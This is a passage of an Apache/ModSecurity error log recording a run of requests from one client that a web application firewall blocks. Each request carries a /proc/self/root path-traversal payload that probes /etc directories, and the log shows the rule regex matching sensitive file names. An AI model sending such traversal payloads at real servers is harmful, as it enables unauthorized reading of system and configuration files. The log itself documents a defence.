"abumsRkFeYa1D6dYQnC6fwAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:33:06.574879 2026] [:error] [pid 27403:tid 140411557287680] [client 74.7.243.128:56000] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumshkFeYa1D6dYQnC6gAAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:08.647744 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.243.128:56004] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumswbLMZ6AikZjR9UqawAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:10.235147 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.243.128:60682] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumtuyqAr6etmhZHNowmQAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:11.659111 2026] [:error] [pid 27403:tid 140411565680384] [client 74.7.243.128:60694] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumtxkFeYa1D6dYQnC6hwAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:12.996578 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:60706] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumuMdf6f5d65gmYZRAPAAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:14.294940 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.243.128:60716] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumugbLMZ6AikZjR9UqbQAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:18.374754 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.243.128:60724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumu-oXxyEfFpUF8f_dcAAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:25.191726 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.243.128:36032] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumxQbLMZ6AikZjR9UqfAAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:26.523564 2026] [:error] [pid 27403:tid 140411540502272] [client 74.7.243.128:36040] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumxhkFeYa1D6dYQnC6jwAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:28.642910 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.243.128:36052] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumyOyqAr6etmhZHNowqAAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:31.204497 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.243.128:51120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumy_-YZRR_7pZ7nDJaFgAAA8k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:32.514617 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:51122] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumzAkwaGbbGflqUZCBaAAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:34.897634 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:51128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumzsdf6f5d65gmYZRATgAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:36.228013 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.243.128:51140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abum0Pu8EFLIOrSqIptqdgAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:39.914321 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.243.128:51148] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abum0sdf6f5d65gmYZRAUAAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:42.382421 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:38028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abum1vu8EFLIOrSqIptqfAAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:43.712884 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:38044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abum1wkwaGbbGflqUZCBcgAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:44.995498 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:38060] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abum2OoXxyEfFpUF8f_diQAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:47.452156 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:38068] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abum29a6ubjKNq_cu4YORwAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:48.767349 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:38080] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abum3AkwaGbbGflqUZCBegAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:50.094905 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:44664] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abum3uoXxyEfFpUF8f_digAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:52.319262 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.243.128:44666] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abum3_-YZRR_7pZ7nDJaKgAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:53.944807 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:44678] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 